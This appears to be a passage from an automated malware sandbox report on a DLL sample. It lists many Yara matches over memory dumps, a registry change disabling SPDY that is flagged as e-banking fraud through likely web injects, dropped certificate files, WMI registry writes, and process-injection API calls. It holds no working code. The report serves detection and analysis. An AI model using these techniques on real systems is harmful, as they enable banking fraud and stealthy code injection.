Source: Yara match	File source: 0000001A.00000003.508252073.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387911041.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387848554.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.606984804.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.609139128.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.743014164.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387690686.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742810151.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.607160802.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.388080339.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742565489.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742635161.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.388156099.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387614709.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.433046999.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.388142124.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.438809080.000000000542C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.743129288.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742454861.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742926350.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.504617331.000001985CADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.508411466.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387950801.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000002.744378617.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.594123395.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.491794343.0000000006378000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742968366.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 6468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 2880, type: MEMORYSTR
Source: Yara match	File source: 4.3.rundll32.exe.4e394a0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4e394a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55d6940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55d6940.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.552a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.552a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000000.604999946.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.507197742.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000000.741896221.0000000003610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.667078163.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000000.741217358.0000000003610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.703035684.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.622907247.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.564167327.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.504046961.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.686963959.0000019853F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.569771687.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.436035470.00000000055A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.603233146.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.572421841.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.606133763.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.505634538.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.619033467.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000000.740581278.0000000003610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.654783377.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.615194902.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.661830136.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.698826675.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.435816444.000000000552A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.695593372.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Disables SPDY (HTTP compression, likely to perform web injects)

Source: Yara match	File source: 0000002E.00000002.895620050.000001EF36402000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.436099354.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742734831.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.610002032.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.508252073.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387911041.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387848554.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.894363379.000002BFD6F02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.606984804.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.609139128.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.743014164.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387690686.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742810151.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000003.607160802.0000028A77D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.388080339.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742565489.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742635161.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.388156099.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387614709.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.433046999.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.388142124.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.438809080.000000000542C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000002.888570101.0000024373502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.743129288.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742454861.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742926350.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.504617331.000001985CADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.508411466.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.387950801.0000000005628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000002.744378617.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.594123395.00000224C785C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.491794343.0000000006378000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.742968366.0000000003D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 6468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 3932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 2880, type: MEMORYSTR
Source: Yara match	File source: 4.3.rundll32.exe.4e394a0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4e394a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55d6940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55d6940.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.55a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.552a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.552a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000000.604999946.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.507197742.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000000.741896221.0000000003610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.667078163.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000000.741217358.0000000003610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.703035684.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.622907247.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.564167327.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.504046961.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.686963959.0000019853F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.569771687.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.436035470.00000000055A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.603233146.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.572421841.0000000005DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.606133763.0000028A77740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.505634538.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.619033467.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000000.740581278.0000000003610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.654783377.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.615194902.000002BFD6C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.661830136.000001EF35E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.698826675.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.435816444.000000000552A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000000.695593372.0000024373BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B95F.bin\Root.pfx			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B95F.bin\AuthRoot.pfx			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

4_2_04AB3072

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 6856, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Writes registry values via WMI

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 604

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04AB821C	4_2_04AB821C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04AB198A	4_2_04AB198A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04AB475F	4_2_04AB475F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DE84D9	4_2_05DE84D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DF37F4	4_2_05DF37F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DD8FA6	4_2_05DD8FA6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DD1E50	4_2_05DD1E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DEC3A9	4_2_05DEC3A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DF0B0E	4_2_05DF0B0E
Source: C:\Windows\System32\control.exe	Code function: 26_2_00943B64	26_2_00943B64
Source: C:\Windows\System32\control.exe	Code function: 26_2_00948C30	26_2_00948C30
Source: C:\Windows\System32\control.exe	Code function: 26_2_00938D20	26_2_00938D20
Source: C:\Windows\System32\control.exe	Code function: 26_2_00956814	26_2_00956814
Source: C:\Windows\System32\control.exe	Code function: 26_2_0094F83C	26_2_0094F83C
Source: C:\Windows\System32\control.exe	Code function: 26_2_0095A84C	26_2_0095A84C
Source: C:\Windows\System32\control.exe	Code function: 26_2_0095099C	26_2_0095099C
Source: C:\Windows\System32\control.exe	Code function: 26_2_0095C1CC	26_2_0095C1CC
Source: C:\Windows\System32\control.exe	Code function: 26_2_0094B910	26_2_0094B910
Source: C:\Windows\System32\control.exe	Code function: 26_2_0093711C	26_2_0093711C
Source: C:\Windows\System32\control.exe	Code function: 26_2_00956138	26_2_00956138
Source: C:\Windows\System32\control.exe	Code function: 26_2_0093C96C	26_2_0093C96C
Source: C:\Windows\System32\control.exe	Code function: 26_2_00931AF4	26_2_00931AF4
Source: C:\Windows\System32\control.exe	Code function: 26_2_0093A2F8	26_2_0093A2F8
Source: C:\Windows\System32\control.exe	Code function: 26_2_0093D2EC	26_2_0093D2EC
Source: C:\Windows\System32\control.exe	Code function: 26_2_00953248	26_2_00953248
Source: C:\Windows\System32\control.exe	Code function: 26_2_0095AB84	26_2_0095AB84
Source: C:\Windows\System32\control.exe	Code function: 26_2_009443BC	26_2_009443BC
Source: C:\Windows\System32\control.exe	Code function: 26_2_0093DBAC	26_2_0093DBAC
Source: C:\Windows\System32\control.exe	Code function: 26_2_00955BD4	26_2_00955BD4
Source: C:\Windows\System32\control.exe	Code function: 26_2_00958BD8	26_2_00958BD8
Source: C:\Windows\System32\control.exe	Code function: 26_2_0095833C	26_2_0095833C
Source: C:\Windows\System32\control.exe	Code function: 26_2_00931338	26_2_00931338
Source: C:\Windows\System32\control.exe	Code function: 26_2_00934338	26_2_00934338
Source: C:\Windows\System32\control.exe	Code function: 26_2_0094D36C	26_2_0094D36C
Source: C:\Windows\System32\control.exe	Code function: 26_2_0094DC8C	26_2_0094DC8C
Source: C:\Windows\System32\control.exe	Code function: 26_2_0095CCC4	26_2_0095CCC4
Source: C:\Windows\System32\control.exe	Code function: 26_2_0094FCEC	26_2_0094FCEC
Source: C:\Windows\System32\control.exe	Code function: 26_2_00948454	26_2_00948454
Source: C:\Windows\System32\control.exe	Code function: 26_2_00934C54	26_2_00934C54
Source: C:\Windows\System32\control.exe	Code function: 26_2_00956C40	26_2_00956C40
Source: C:\Windows\System32\control.exe	Code function: 26_2_0093E464	26_2_0093E464
Source: C:\Windows\System32\control.exe	Code function: 26_2_0094ADF0	26_2_0094ADF0
Source: C:\Windows\System32\control.exe	Code function: 26_2_00940500	26_2_00940500
Source: C:\Windows\System32\control.exe	Code function: 26_2_00947D50	26_2_00947D50
Source: C:\Windows\System32\control.exe	Code function: 26_2_0094E578	26_2_0094E578
Source: C:\Windows\System32\control.exe	Code function: 26_2_00957650	26_2_00957650
Source: C:\Windows\System32\control.exe	Code function: 26_2_00941678	26_2_00941678
Source: C:\Windows\System32\control.exe	Code function: 26_2_0095B7AC	26_2_0095B7AC
Source: C:\Windows\System32\control.exe	Code function: 26_2_009347E4	26_2_009347E4
Source: C:\Windows\System32\control.exe	Code function: 26_2_0094BF14	26_2_0094BF14
Source: C:\Windows\System32\control.exe	Code function: 26_2_00959708	26_2_00959708
Source: C:\Windows\System32\control.exe	Code function: 26_2_00931F34	26_2_00931F34
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77753B64	40_2_0000028A77753B64
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77758C30	40_2_0000028A77758C30
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7776A84C	40_2_0000028A7776A84C
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77766138	40_2_0000028A77766138
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7774711C	40_2_0000028A7774711C
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7775B910	40_2_0000028A7775B910
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7776B7AC	40_2_0000028A7776B7AC
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7775F83C	40_2_0000028A7775F83C
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77766814	40_2_0000028A77766814
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A777447E4	40_2_0000028A777447E4
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77751678	40_2_0000028A77751678
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77767650	40_2_0000028A77767650
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77741F34	40_2_0000028A77741F34
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7775BF14	40_2_0000028A7775BF14
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77769708	40_2_0000028A77769708
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7775E578	40_2_0000028A7775E578
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77757D50	40_2_0000028A77757D50
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7775ADF0	40_2_0000028A7775ADF0
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7776CCC4	40_2_0000028A7776CCC4
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7775DC8C	40_2_0000028A7775DC8C
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7774E464	40_2_0000028A7774E464
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77744C54	40_2_0000028A77744C54
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77758454	40_2_0000028A77758454
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77748D20	40_2_0000028A77748D20
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77750500	40_2_0000028A77750500
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7775FCEC	40_2_0000028A7775FCEC
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A777543BC	40_2_0000028A777543BC
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7774DBAC	40_2_0000028A7774DBAC
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7776AB84	40_2_0000028A7776AB84
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7775D36C	40_2_0000028A7775D36C
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77766C40	40_2_0000028A77766C40
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77768BD8	40_2_0000028A77768BD8
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77765BD4	40_2_0000028A77765BD4
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7776833C	40_2_0000028A7776833C
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77741338	40_2_0000028A77741338
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77744338	40_2_0000028A77744338
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7774D2EC	40_2_0000028A7774D2EC
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7774A2F8	40_2_0000028A7774A2F8
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77741AF4	40_2_0000028A77741AF4
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7776099C	40_2_0000028A7776099C
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7774C96C	40_2_0000028A7774C96C
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A77763248	40_2_0000028A77763248
Source: C:\Windows\System32\rundll32.exe	Code function: 40_2_0000028A7776C1CC	40_2_0000028A7776C1CC

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_05DE488B CreateProcessAsUserW,

4_2_05DE488B

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: d6YCUW421p.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 00000012.00000003.457911317.0000023DBE700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
Source: Process Memory Space: powershell.exe PID: 6856, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04AB3A9C NtMapViewOfSection,	4_2_04AB3A9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04AB4695 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	4_2_04AB4695
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04AB25D7 GetProcAddress,NtCreateSection,memset,	4_2_04AB25D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04AB8441 NtQueryVirtualMemory,	4_2_04AB8441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DDDDDD GetProcAddress,NtCreateSection,memset,	4_2_05DDDDDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DEF5FF memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	4_2_05DEF5FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DEAD9E NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	4_2_05DEAD9E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DE5D9D NtQueryInformationProcess,	4_2_05DE5D9D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05DD94A5 NtMapViewOfSection,	4_2_05DD94A5
